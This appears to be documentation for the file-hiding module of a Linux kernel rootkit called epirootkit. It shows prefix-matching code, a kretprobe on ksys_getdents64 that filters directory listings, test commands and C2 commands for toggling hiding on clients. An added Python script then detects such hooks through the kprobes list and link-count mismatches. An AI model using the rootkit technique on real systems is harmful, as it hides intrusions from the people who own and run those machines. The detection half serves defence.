File Hiding
Hide files and directories from directory listings using syscall interception
Implementation
static const char * const hide_prefixes[] = {
    "epirootkit",     /* directory entries whose names start with one of */
    "jules_est_bo_",  /* these prefixes are dropped from getdents64 results */
};

file_hiding_state.getdents_probe = (struct kretprobe) {
    .kp.symbol_name = "ksys_getdents64",        /* kernel function being probed */
    .handler        = getdents64_ret_handler,   /* runs on return: filters the entry buffer */
    .entry_handler  = getdents64_entry_handler, /* runs on entry: saves the call context */
    .data_size      = sizeof(struct getdents_context), /* per-call data shared between the two handlers */
    .maxactive      = 20                        /* number of concurrent probed calls tracked */
};
Hooks the ksys_getdents64 syscall with a kretprobe: the entry handler records the call context, and the return handler removes directory entries whose names match one of the hidden prefixes before the listing reaches user space.
Testing
# Create test files
touch /tmp/epirootkit_test.txt /tmp/normal_file.txt
# Without file hiding
ls /tmp/
# Output: epirootkit_test.txt normal_file.txt
# With file hiding enabled
ls /tmp/
# Output: normal_file.txt
Control
WebUI
Toggle via Configuration Panel
C2 Commands
enable-file-hiding Client-1 # Enable hiding
disable-file-hiding Client-1 # Disable hiding
status Client-1 # Check state
Hidden files remain accessible by full path (open, stat, and so on still work); only directory listings served through getdents64 are filtered.
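That asymmetry is what a defender can check from user space. The following script is an added example and not part of the epirootkit project: it parses the kernel's registered-probe list (/sys/kernel/debug/kprobes/list, which requires root and a mounted debugfs) for probes on the getdents path, and compares a directory's stat() hard-link count with the number of subdirectories its listing returns, which exposes hidden subdirectories on filesystems that maintain link counts (ext4, xfs, tmpfs). The symbol list and the directory paths scanned in the main block are assumptions chosen for illustration.

```python
import os
from typing import List, Optional, Tuple

# Registered-probe list (format documented in Documentation/trace/kprobes.rst);
# reading it needs root and a mounted debugfs.
KPROBES_LIST = "/sys/kernel/debug/kprobes/list"
# Kernel functions on the directory-listing path (assumed watch list). A probe on
# any of them is suspicious unless you registered it yourself, e.g. a tracing tool.
GETDENTS_SYMBOLS = ("ksys_getdents64", "__x64_sys_getdents64", "iterate_dir")

def suspicious_probes(lines: List[str]) -> List[Tuple[str, str]]:
    """Parse kprobes/list lines ('<addr>  <k|r>  <symbol>+0x<off>  [module] [flags]')
    and return (type, symbol) for every probe placed on a getdents-related symbol."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        ptype, symbol = parts[1], parts[2].split("+", 1)[0]
        if ptype in ("k", "r") and symbol in GETDENTS_SYMBOLS:
            hits.append((ptype, symbol))
    return hits

def missing_subdirs(nlink: int, listed_subdirs: int) -> Optional[int]:
    """Filesystems that maintain link counts give a directory 2 + <number of
    subdirectories> links, and stat() does not go through getdents64. Returns how
    many subdirectories the listing is short, or None when the filesystem does
    not keep the count (btrfs, for example, reports nlink == 1 for directories)."""
    if nlink < 2:
        return None
    return nlink - 2 - listed_subdirs

def check_directory(path: str) -> Optional[int]:
    """Compare the stat() link count with the number of subdirectories the
    (possibly filtered) listing returns; a positive result means entries are missing."""
    nlink = os.lstat(path).st_nlink
    listed = sum(1 for e in os.scandir(path) if e.is_dir(follow_symlinks=False))
    return missing_subdirs(nlink, listed)

if __name__ == "__main__":
    try:
        with open(KPROBES_LIST) as fh:
            for ptype, sym in suspicious_probes(fh.read().splitlines()):
                print(f"probe type={ptype} on {sym}")
    except OSError as exc:
        print(f"cannot read {KPROBES_LIST}: {exc}")
    for d in ("/tmp", "/etc", "/var"):
        print(d, "missing subdirectories:", check_directory(d))
```

A rootkit with kernel privileges can also tamper with the probe list or stat results, so treat a clean result as one signal, not proof of absence.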